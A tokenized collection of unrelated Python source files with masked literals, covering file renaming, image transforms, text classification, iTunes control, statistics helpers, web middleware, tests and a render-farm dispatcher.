<EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . 
_removecheck = boolean <EOL> @ property <EOL> def remdups ( self ) : <EOL> return self . _remdups <EOL> @ remdups . setter <EOL> def remdups ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _remdups = boolean <EOL> @ property <EOL> def remext ( self ) : <EOL> return self . _remext <EOL> @ remext . setter <EOL> def remext ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _remext = boolean <EOL> @ property <EOL> def remnonwords ( self ) : <EOL> return self . _remnonwords <EOL> @ remnonwords . setter <EOL> def remnonwords ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _remnonwords = boolean <EOL> @ property <EOL> def ignorecase ( self ) : <EOL> return self . _ignorecase <EOL> @ ignorecase . setter <EOL> def ignorecase ( self , boolean ) : <EOL> flag = <NUM_LIT:0> <EOL> if boolean : <EOL> flag = re . I <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _ignorecase = flag <EOL> @ property <EOL> def mediamode ( self ) : <EOL> return self . _mediamode <EOL> @ mediamode . setter <EOL> def mediamode ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _mediamode = boolean <EOL> @ property <EOL> def countcheck ( self ) : <EOL> return self . _countcheck <EOL> @ countcheck . setter <EOL> def countcheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _countcheck = boolean <EOL> @ property <EOL> def countfill ( self ) : <EOL> return self . _countfill <EOL> @ countfill . setter <EOL> def countfill ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _countfill = boolean <EOL> @ property <EOL> def countpos ( self ) : <EOL> return self . _countpos <EOL> @ countpos . setter <EOL> def countpos ( self , index ) : <EOL> log . debug ( "<STR_LIT>" . format ( index ) ) <EOL> self . 
_countpos = index <EOL> @ property <EOL> def countbase ( self ) : <EOL> return self . _countbase <EOL> @ countbase . setter <EOL> def countbase ( self , num ) : <EOL> log . debug ( "<STR_LIT>" . format ( num ) ) <EOL> self . _countbase = num <EOL> @ property <EOL> def countstep ( self ) : <EOL> return self . _countstep <EOL> @ countstep . setter <EOL> def countstep ( self , num ) : <EOL> log . debug ( "<STR_LIT>" . format ( num ) ) <EOL> self . _countstep = num <EOL> @ property <EOL> def insertcheck ( self ) : <EOL> return self . _insertcheck <EOL> @ insertcheck . setter <EOL> def insertcheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _insertcheck = boolean <EOL> @ property <EOL> def insertpos ( self ) : <EOL> return self . _insertpos <EOL> @ insertpos . setter <EOL> def insertpos ( self , index ) : <EOL> log . debug ( "<STR_LIT>" . format ( index ) ) <EOL> self . _insertpos = index <EOL> @ property <EOL> def deletecheck ( self ) : <EOL> return self . _deletecheck <EOL> @ deletecheck . setter <EOL> def deletecheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _deletecheck = boolean <EOL> @ property <EOL> def deletestart ( self ) : <EOL> return self . _deletestart <EOL> @ deletestart . setter <EOL> def deletestart ( self , index ) : <EOL> log . debug ( "<STR_LIT>" . format ( index ) ) <EOL> self . _deletestart = index <EOL> @ property <EOL> def deleteend ( self ) : <EOL> return self . _deleteend <EOL> @ deleteend . setter <EOL> def deleteend ( self , index ) : <EOL> log . debug ( "<STR_LIT>" . format ( index ) ) <EOL> self . _deleteend = index <EOL> @ property <EOL> def casecheck ( self ) : <EOL> return self . _casecheck <EOL> @ casecheck . setter <EOL> def casecheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _casecheck = boolean <EOL> @ property <EOL> def casemode ( self ) : <EOL> return self . _casemode <EOL> @ casemode . 
setter <EOL> def casemode ( self , num ) : <EOL> log . debug ( "<STR_LIT>" . format ( num ) ) <EOL> self . _casemode = num <EOL> @ property <EOL> def spacecheck ( self ) : <EOL> return self . _spacecheck <EOL> @ spacecheck . setter <EOL> def spacecheck ( self , boolean ) : <EOL> log . debug ( "<STR_LIT>" . format ( boolean ) ) <EOL> self . _spacecheck = boolean <EOL> @ property <EOL> def spacemode ( self ) : <EOL> return self . _spacemode <EOL> @ spacemode . setter <EOL> def spacemode ( self , num ) : <EOL> log . debug ( "<STR_LIT>" . format ( num ) ) <EOL> self . _spacemode = num <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> fileops = FileOps ( hidden = True , recursive = True , casemode = "<STR_LIT:1>" ) <EOL> fileops . get_previews ( fileops . get_targets ( ) , "<STR_LIT:*>" , "<STR_LIT>" ) </s>
<s> from PIL import Image <EOL> TRANSFORM_AXIS = { <EOL> Image . EXTENT : ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> Image . AFFINE : ( None , None , <NUM_LIT:0> , None , None , <NUM_LIT:1> ) , <EOL> Image . QUAD : ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> Image . PERSPECTIVE : ( None , None , None , None , None , None , None , None ) , <EOL> } <EOL> class Transform ( list ) : <EOL> def __init__ ( self , spec , image_size = None ) : <EOL> super ( Transform , self ) . __init__ ( spec ) <EOL> self . flag = getattr ( Image , self [ <NUM_LIT:0> ] . upper ( ) ) <EOL> try : <EOL> axis = ( None , <NUM_LIT:0> , <NUM_LIT:1> ) + TRANSFORM_AXIS [ self . flag ] <EOL> except KeyError : <EOL> raise ValueError ( '<STR_LIT>' % self [ <NUM_LIT:0> ] ) <EOL> if len ( self ) != len ( axis ) : <EOL> raise ValueError ( '<STR_LIT>' % ( len ( axis ) , len ( self ) ) ) <EOL> for i in xrange ( <NUM_LIT:1> , len ( self ) ) : <EOL> v = self [ i ] <EOL> if isinstance ( v , basestring ) : <EOL> if v [ - <NUM_LIT:1> : ] in ( '<STR_LIT:%>' , '<STR_LIT:p>' ) : <EOL> if axis [ i ] is None : <EOL> raise ValueError ( '<STR_LIT>' % ( self [ <NUM_LIT:0> ] , i ) ) <EOL> if image_size is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self [ i ] = image_size [ axis [ i ] ] * float ( v [ : - <NUM_LIT:1> ] ) / <NUM_LIT:100> <EOL> else : <EOL> self [ i ] = float ( v ) <EOL> if not self [ <NUM_LIT:1> ] or not self [ <NUM_LIT:2> ] : <EOL> if not image_size : <EOL> ValueError ( '<STR_LIT>' ) <EOL> self [ <NUM_LIT:1> ] = int ( self [ <NUM_LIT:1> ] or image_size [ <NUM_LIT:0> ] ) <EOL> self [ <NUM_LIT:2> ] = int ( self [ <NUM_LIT:2> ] or image_size [ <NUM_LIT:1> ] ) <EOL> @ property <EOL> def size ( self ) : <EOL> return self [ <NUM_LIT:1> ] , self [ <NUM_LIT:2> ] <EOL> def apply ( self , image ) : <EOL> return image . transform ( <EOL> ( int ( self [ <NUM_LIT:1> ] or image . 
size [ <NUM_LIT:0> ] ) , int ( self [ <NUM_LIT:2> ] or image . size [ <NUM_LIT:1> ] ) ) , <EOL> self . flag , <EOL> self [ <NUM_LIT:3> : ] , <EOL> Image . BILINEAR , <EOL> ) </s>
<s> from sklearn . datasets import load_files <EOL> from sklearn . feature_extraction . text import TfidfVectorizer <EOL> from sklearn . grid_search import GridSearchCV <EOL> from sklearn . pipeline import Pipeline <EOL> from sklearn . svm import LinearSVC <EOL> data = load_files ( '<STR_LIT>' ) <EOL> vect = TfidfVectorizer ( ) <EOL> X = vect . fit_transform ( data . data ) <EOL> params = { "<STR_LIT>" : [ ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) ] , <EOL> "<STR_LIT>" : [ <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:8> , <NUM_LIT:10> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:2> ] <EOL> } <EOL> clf = Pipeline ( [ ( "<STR_LIT>" , TfidfVectorizer ( sublinear_tf = True ) ) , <EOL> ( "<STR_LIT>" , LinearSVC ( loss = '<STR_LIT>' , max_iter = <NUM_LIT:1000> ) ) ] ) <EOL> gs = GridSearchCV ( clf , params , verbose = <NUM_LIT:2> , n_jobs = - <NUM_LIT:1> ) <EOL> gs . fit ( data . data , data . target ) <EOL> print ( gs . best_estimator_ ) <EOL> print ( gs . best_score_ ) <EOL> '''<STR_LIT>''' </s>
<s> import speech <EOL> import subprocess <EOL> import os <EOL> import platform <EOL> import settings <EOL> DEFAULT_ITUNES_PLAY = """<STR_LIT>""" <EOL> ITUNES_SONG_AND_ARTIST = """<STR_LIT>""" <EOL> ITUNES_ALBUM_AND_ARTIST = """<STR_LIT>""" <EOL> ITUNES_ALBUM = """<STR_LIT>""" <EOL> ITUNES_ARTIST = """<STR_LIT>""" <EOL> SKIP = """<STR_LIT>""" <EOL> PAUSE = """<STR_LIT>""" <EOL> RESUME = """<STR_LIT>""" <EOL> def pause ( ) : <EOL> """<STR_LIT>""" <EOL> if not platformCompatible ( ) : <EOL> return False <EOL> ( output , error ) = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , PAUSE ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> def resume ( ) : <EOL> """<STR_LIT>""" <EOL> if not platformCompatible ( ) : <EOL> return False <EOL> ( output , error ) = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , RESUME ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> def skip ( ) : <EOL> """<STR_LIT>""" <EOL> if not platformCompatible ( ) : <EOL> return False <EOL> ( output , error ) = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , SKIP ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> def play ( song , artist = None , album = None ) : <EOL> """<STR_LIT>""" <EOL> if not settings . platformCompatible ( ) : <EOL> return False <EOL> if song and not artist and not album : <EOL> ( output , error ) = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , DEFAULT_ITUNES_PLAY % ( song , song , song ) ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> if output : <EOL> speech . speak ( "<STR_LIT>" + output ) <EOL> else : <EOL> speech . speak ( "<STR_LIT>" + song + "<STR_LIT>" ) <EOL> elif song and artist and not album : <EOL> ( output , error ) = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , ITUNES_SONG_AND_ARTIST % ( song , artist , song , artist ) ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> if output : <EOL> speech . speak ( "<STR_LIT>" + output ) <EOL> else : <EOL> speech . 
speak ( "<STR_LIT>" + song + "<STR_LIT>" ) <EOL> elif album and artist and not song : <EOL> ( output , error ) = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , ITUNES_ALBUM_AND_ARTIST % ( artist , album ) ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> if output : <EOL> speech . speak ( "<STR_LIT>" + output ) <EOL> else : <EOL> speech . speak ( "<STR_LIT>" + song + "<STR_LIT>" ) <EOL> elif album and not artist and not song : <EOL> ( output , error ) = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , ITUNES_ALBUM % ( album ) ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> if output : <EOL> speech . speak ( "<STR_LIT>" + output ) <EOL> else : <EOL> speech . speak ( "<STR_LIT>" + song + "<STR_LIT>" ) <EOL> elif artist and not album and not song : <EOL> ( output , error ) = subprocess . Popen ( [ "<STR_LIT>" , "<STR_LIT>" , ITUNES_ARTIST % ( artist ) ] , stdout = subprocess . PIPE ) . communicate ( ) <EOL> if output : <EOL> speech . speak ( "<STR_LIT>" + output ) <EOL> else : <EOL> speech . speak ( "<STR_LIT>" + song + "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import math <EOL> import re <EOL> def percent_of ( part , whole ) : <EOL> """<STR_LIT>""" <EOL> return float ( part * <NUM_LIT:100> ) / whole <EOL> def mean ( r ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return float ( sum ( r ) ) / len ( r ) <EOL> except ZeroDivisionError : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> average = mean <EOL> def median ( r ) : <EOL> """<STR_LIT>""" <EOL> s = list ( r ) <EOL> s_len = len ( s ) <EOL> if s_len == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> s . sort ( ) <EOL> center = s_len // <NUM_LIT:2> <EOL> is_odd = s_len % <NUM_LIT:2> <EOL> if is_odd : <EOL> return s [ center ] <EOL> low = s [ center - <NUM_LIT:1> ] <EOL> high = s [ center ] <EOL> return mean ( [ low , high ] ) <EOL> def standard_deviation ( r , sample = True ) : <EOL> """<STR_LIT>""" <EOL> avg = average ( r ) <EOL> sdsq = sum ( [ ( i - avg ) ** <NUM_LIT:2> for i in r ] ) <EOL> if sample : <EOL> normal_denom = len ( r ) - <NUM_LIT:1> or <NUM_LIT:1> <EOL> else : <EOL> normal_denom = len ( r ) <EOL> return ( sdsq / normal_denom ) ** <NUM_LIT:0.5> <EOL> def format_data_size ( size , unit , precision = <NUM_LIT:1> , binary = False , full_name = False ) : <EOL> """<STR_LIT>""" <EOL> if full_name is None : <EOL> full_name = len ( unit ) > <NUM_LIT:1> <EOL> if not binary : <EOL> base = <NUM_LIT:1000> <EOL> if full_name : <EOL> multiples = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> multiples = ( '<STR_LIT>' , '<STR_LIT:k>' , '<STR_LIT:M>' , '<STR_LIT>' , '<STR_LIT:T>' , '<STR_LIT:P>' , '<STR_LIT:E>' , '<STR_LIT>' , '<STR_LIT:Y>' ) <EOL> else : <EOL> base = <NUM_LIT> <EOL> if full_name : <EOL> multiples = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> multiples = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , 
'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> sign = "<STR_LIT>" <EOL> if size > <NUM_LIT:0> : <EOL> m = int ( math . log ( size , base ) ) <EOL> elif size < <NUM_LIT:0> : <EOL> sign = "<STR_LIT:->" <EOL> size = - size <EOL> m = int ( math . log ( size , base ) ) <EOL> else : <EOL> m = <NUM_LIT:0> <EOL> if m > <NUM_LIT:8> : <EOL> m = <NUM_LIT:8> <EOL> if m == <NUM_LIT:0> : <EOL> precision = '<STR_LIT>' <EOL> else : <EOL> precision = '<STR_LIT>' % precision <EOL> size = precision % ( size / math . pow ( base , m ) ) <EOL> return '<STR_LIT>' % ( sign , size . strip ( ) , multiples [ m ] , unit ) <EOL> def format_byte_size ( size , precision = <NUM_LIT:1> , binary = False , full_name = False ) : <EOL> """<STR_LIT>""" <EOL> if full_name : <EOL> return format_data_size ( size , "<STR_LIT>" , precision , binary , True ) <EOL> else : <EOL> return format_data_size ( size , "<STR_LIT:B>" , precision , binary , False ) <EOL> def format_bit_size ( size , precision = <NUM_LIT:1> , binary = False , full_name = False ) : <EOL> """<STR_LIT>""" <EOL> if full_name : <EOL> return format_data_size ( size , "<STR_LIT>" , precision , binary , True ) <EOL> else : <EOL> return format_data_size ( size , "<STR_LIT:b>" , precision , binary , False ) </s>
<s> from webob import Request , Response <EOL> class SessionManager ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , application = None , days = <NUM_LIT> , session_class = None ) : <EOL> self . session_class = session_class <EOL> self . days = days <EOL> if application : <EOL> self . application = application <EOL> else : <EOL> self . applicaion = Response ( ) <EOL> def __call__ ( self , environ , start_response ) : <EOL> req = Request ( environ ) <EOL> environ [ '<STR_LIT>' ] = self . session_class . _before ( req ) <EOL> environ . setdefault ( '<STR_LIT>' , { } ) [ '<STR_LIT>' ] = environ [ '<STR_LIT>' ] <EOL> resp = req . get_response ( self . application ) <EOL> environ [ '<STR_LIT>' ] . _after ( req , resp ) <EOL> return resp ( environ , start_response ) </s>
<s> import unittest <EOL> import pybald <EOL> from pybald import context <EOL> class TestConfig ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def tearDown ( self ) : <EOL> context . _reset ( ) <EOL> def test_default_config ( self ) : <EOL> "<STR_LIT>" <EOL> context = pybald . configure ( ) <EOL> assert context . config . debug == True <EOL> assert context . config . env_name == '<STR_LIT>' <EOL> def test_read_from_file ( self ) : <EOL> "<STR_LIT>" <EOL> context = pybald . configure ( config_file = "<STR_LIT>" ) <EOL> assert context . config . sample_config == True <EOL> assert context . config . env_name == '<STR_LIT>' <EOL> def test_read_from_object ( self ) : <EOL> "<STR_LIT>" <EOL> config_obj = dict ( conf_object = True , env_name = "<STR_LIT>" ) <EOL> context = pybald . configure ( config_object = config_obj ) <EOL> assert context . config . conf_object == True <EOL> assert context . config . env_name == "<STR_LIT>" <EOL> def test_missing_file ( self ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> pybald . configure ( config_file = "<STR_LIT>" ) <EOL> except SystemExit : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) </s>
<s> from east import utils <EOL> def worst_case_strings_collection ( m , n ) : <EOL> prefix = utils . random_string ( n - <NUM_LIT:2> ) <EOL> strings_collection = [ prefix + utils . random_string ( <NUM_LIT:2> ) for _ in xrange ( m ) ] <EOL> return strings_collection </s>
<s> from pipulate import * <EOL> import os <EOL> import globs , common <EOL> print ( r'''<STR_LIT>''' ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> globs . WEB = True <EOL> if '<STR_LIT>' in socket . gethostname ( ) : <EOL> globs . PCOM = True <EOL> app . run ( host = '<STR_LIT>' , port = <NUM_LIT> , debug = True ) <EOL> else : <EOL> app . run ( host = '<STR_LIT>' , port = <NUM_LIT> , debug = False ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = "<STR_LIT>" <EOL> IS_CLINT = True <EOL> try : <EOL> from clint . textui import colored <EOL> except ImportError : <EOL> IS_CLINT = False <EOL> def disable_color ( ) : <EOL> """<STR_LIT>""" <EOL> if IS_CLINT : <EOL> colored . disable ( ) <EOL> def __get_message ( prefix , message , color_function ) : <EOL> """<STR_LIT>""" <EOL> message = "<STR_LIT>" . format ( prefix , message ) <EOL> if IS_CLINT : <EOL> return color_function ( message ) <EOL> else : <EOL> return message <EOL> def get_error_message ( message ) : <EOL> """<STR_LIT>""" <EOL> if IS_CLINT : <EOL> func = colored . red <EOL> else : <EOL> func = None <EOL> return __get_message ( "<STR_LIT>" , message , func ) <EOL> def get_warning_message ( message ) : <EOL> """<STR_LIT>""" <EOL> if IS_CLINT : <EOL> func = colored . yellow <EOL> else : <EOL> func = None <EOL> return __get_message ( "<STR_LIT>" , message , func ) <EOL> def get_success_message ( message ) : <EOL> """<STR_LIT>""" <EOL> if IS_CLINT : <EOL> func = colored . green <EOL> else : <EOL> func = None <EOL> return __get_message ( "<STR_LIT>" , message , func ) <EOL> def print_error_message ( message ) : <EOL> """<STR_LIT>""" <EOL> print get_error_message ( message ) <EOL> def print_warning_message ( message ) : <EOL> """<STR_LIT>""" <EOL> print get_warning_message ( message ) <EOL> def print_success_message ( message ) : <EOL> """<STR_LIT>""" <EOL> print get_success_message ( message ) </s>
<s> from __future__ import absolute_import <EOL> """<STR_LIT:U+0020>""" <EOL> from puliclient . server . renderNodeHandler import RenderNodeHandler <EOL> from octopus . core import enums <EOL> rnHandler = RenderNodeHandler ( ) <EOL> ( allRnList , summary ) = rnHandler . getAllRenderNodes ( ) <EOL> print "<STR_LIT>" <EOL> if allRnList : <EOL> for rn in allRnList : <EOL> print "<STR_LIT>" % ( rn . id , rn . name , rn . host , rn . systemFreeRam , rn . ramSize ) <EOL> ( results , summary ) = rnHandler . getRenderNodes ( <EOL> idList = [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] , <EOL> nameList = [ "<STR_LIT>" ] , <EOL> hostList = [ "<STR_LIT>" ] , <EOL> versionList = [ "<STR_LIT>" ] , <EOL> poolList = [ "<STR_LIT:default>" , "<STR_LIT>" ] , <EOL> statusList = [ enums . RN_IDLE ] , <EOL> ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> if results : <EOL> for rn in results : <EOL> print "<STR_LIT>" % ( rn . id , rn . name , rn . host , rn . puliversion , rn . systemFreeRam , rn . ramSize ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import with_statement <EOL> import logging <EOL> import socket <EOL> import time <EOL> from Queue import Queue <EOL> from itertools import groupby , ifilter , chain <EOL> import collections <EOL> try : <EOL> import simplejson as json <EOL> except ImportError : <EOL> import json <EOL> from octopus . core import singletonconfig , singletonstats <EOL> from octopus . core . threadpool import ThreadPool , makeRequests , NoResultsPending <EOL> from octopus . core . framework import MainLoopApplication <EOL> from octopus . core . tools import elapsedTimeToString <EOL> from octopus . dispatcher . model import ( DispatchTree , FolderNode , RenderNode , <EOL> Pool , PoolShare , enums ) <EOL> from octopus . dispatcher . strategies import FifoStrategy <EOL> from octopus . dispatcher import settings <EOL> from octopus . dispatcher . db . pulidb import PuliDB <EOL> from octopus . dispatcher . model . enums import * <EOL> from octopus . dispatcher . poolman . filepoolman import FilePoolManager <EOL> from octopus . dispatcher . poolman . wspoolman import WebServicePoolManager <EOL> from octopus . dispatcher . licenses . licensemanager import LicenseManager <EOL> class Dispatcher ( MainLoopApplication ) : <EOL> '''<STR_LIT>''' <EOL> instance = None <EOL> init = False <EOL> def __new__ ( cls , framework ) : <EOL> if cls . instance is None : <EOL> cls . instance = super ( Dispatcher , cls ) . __new__ ( cls ) <EOL> return cls . instance <EOL> def __init__ ( self , framework ) : <EOL> LOGGER = logging . getLogger ( '<STR_LIT>' ) <EOL> if self . init : <EOL> return <EOL> self . init = True <EOL> self . nextCycle = time . time ( ) <EOL> MainLoopApplication . __init__ ( self , framework ) <EOL> self . threadPool = ThreadPool ( <NUM_LIT:16> , <NUM_LIT:0> , <NUM_LIT:0> , None ) <EOL> self . cycle = <NUM_LIT:1> <EOL> self . dispatchTree = DispatchTree ( ) <EOL> self . licenseManager = LicenseManager ( ) <EOL> self . enablePuliDB = settings . 
DB_ENABLE <EOL> self . cleanDB = settings . DB_CLEAN_DATA <EOL> self . restartService = False <EOL> self . pulidb = None <EOL> if self . enablePuliDB : <EOL> self . pulidb = PuliDB ( self . cleanDB , self . licenseManager ) <EOL> self . dispatchTree . registerModelListeners ( ) <EOL> rnsAlreadyInitialized = self . initPoolsDataFromBackend ( ) <EOL> if self . enablePuliDB and not self . cleanDB : <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> prevTimer = time . time ( ) <EOL> self . pulidb . restoreStateFromDb ( self . dispatchTree , rnsAlreadyInitialized ) <EOL> LOGGER . warning ( "<STR_LIT>" % len ( self . dispatchTree . tasks ) ) <EOL> LOGGER . warning ( "<STR_LIT>" % elapsedTimeToString ( prevTimer ) ) <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> startTimer = time . time ( ) <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> self . dispatchTree . updateCompletionAndStatus ( ) <EOL> LOGGER . warning ( "<STR_LIT>" % elapsedTimeToString ( startTimer ) ) <EOL> prevTimer = time . time ( ) <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> self . updateRenderNodes ( ) <EOL> LOGGER . warning ( "<STR_LIT>" % elapsedTimeToString ( prevTimer ) ) <EOL> prevTimer = time . time ( ) <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> self . dispatchTree . validateDependencies ( ) <EOL> LOGGER . warning ( "<STR_LIT>" % elapsedTimeToString ( prevTimer ) ) <EOL> LOGGER . warning ( "<STR_LIT>" % elapsedTimeToString ( startTimer ) ) <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> if self . enablePuliDB and not self . cleanDB : <EOL> self . dispatchTree . toModifyElements = [ ] <EOL> if '<STR_LIT:default>' not in self . dispatchTree . pools : <EOL> pool = Pool ( None , name = '<STR_LIT:default>' ) <EOL> LOGGER . warning ( "<STR_LIT>" % pool ) <EOL> self . defaultPool = self . dispatchTree . pools [ '<STR_LIT:default>' ] <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> startTimer = time . time ( ) <EOL> self . loadRules ( ) <EOL> LOGGER . 
warning ( "<STR_LIT>" % elapsedTimeToString ( startTimer ) ) <EOL> LOGGER . warning ( "<STR_LIT>" ) <EOL> self . queue = Queue ( maxsize = <NUM_LIT> ) <EOL> def initPoolsDataFromBackend ( self ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> if settings . POOLS_BACKEND_TYPE == "<STR_LIT:file>" : <EOL> manager = FilePoolManager ( ) <EOL> elif settings . POOLS_BACKEND_TYPE == "<STR_LIT>" : <EOL> manager = WebServicePoolManager ( ) <EOL> elif settings . POOLS_BACKEND_TYPE == "<STR_LIT>" : <EOL> return False <EOL> except Exception : <EOL> return False <EOL> computers = manager . listComputers ( ) <EOL> poolsList = manager . listPools ( ) <EOL> poolsById = { } <EOL> for poolDesc in poolsList : <EOL> pool = Pool ( id = int ( poolDesc . id ) , name = str ( poolDesc . name ) ) <EOL> self . dispatchTree . toCreateElements . append ( pool ) <EOL> poolsById [ pool . id ] = pool <EOL> rnById = { } <EOL> for computerDesc in computers : <EOL> try : <EOL> computerDesc . name = socket . getfqdn ( computerDesc . name ) <EOL> ip = socket . gethostbyname ( computerDesc . name ) <EOL> except socket . gaierror : <EOL> continue <EOL> renderNode = RenderNode ( computerDesc . id , computerDesc . name + "<STR_LIT::>" + str ( computerDesc . port ) , computerDesc . cpucount * computerDesc . cpucores , computerDesc . cpufreq , ip , computerDesc . port , computerDesc . ramsize , json . loads ( computerDesc . properties ) ) <EOL> self . dispatchTree . toCreateElements . append ( renderNode ) <EOL> for pool in computerDesc . pools : <EOL> poolsById [ pool . id ] . renderNodes . append ( renderNode ) <EOL> renderNode . pools . append ( poolsById [ pool . id ] ) <EOL> self . dispatchTree . renderNodes [ str ( renderNode . name ) ] = renderNode <EOL> rnById [ renderNode . id ] = renderNode <EOL> for pool in poolsById . values ( ) : <EOL> self . dispatchTree . pools [ pool . name ] = pool <EOL> if self . cleanDB or not self . enablePuliDB : <EOL> graphs = FolderNode ( <NUM_LIT:1> , "<STR_LIT>" , self . 
dispatchTree . root , "<STR_LIT:root>" , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , FifoStrategy ( ) ) <EOL> self . dispatchTree . toCreateElements . append ( graphs ) <EOL> self . dispatchTree . nodes [ graphs . id ] = graphs <EOL> ps = PoolShare ( <NUM_LIT:1> , self . dispatchTree . pools [ "<STR_LIT:default>" ] , graphs , PoolShare . UNBOUND ) <EOL> self . dispatchTree . toCreateElements . append ( ps ) <EOL> if self . enablePuliDB : <EOL> self . pulidb . dropPoolsAndRnsTables ( ) <EOL> self . pulidb . createElements ( self . dispatchTree . toCreateElements ) <EOL> self . dispatchTree . resetDbElements ( ) <EOL> return True <EOL> def shutdown ( self ) : <EOL> '''<STR_LIT>''' <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> try : <EOL> self . dispatchTree . updateCompletionAndStatus ( ) <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> except Exception : <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> try : <EOL> self . updateRenderNodes ( ) <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> except Exception : <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> try : <EOL> self . dispatchTree . validateDependencies ( ) <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> except Exception : <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> try : <EOL> self . updateDB ( ) <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> except Exception : <EOL> logging . getLogger ( '<STR_LIT>' ) . warning ( "<STR_LIT>" ) <EOL> def loadRules ( self ) : <EOL> from . rules . graphview import GraphViewBuilder <EOL> graphs = self . dispatchTree . findNodeByPath ( "<STR_LIT>" , None ) <EOL> if graphs is None : <EOL> logging . getLogger ( '<STR_LIT>' ) . fatal ( "<STR_LIT>" ) <EOL> self . stop ( ) <EOL> self . dispatchTree . rules . 
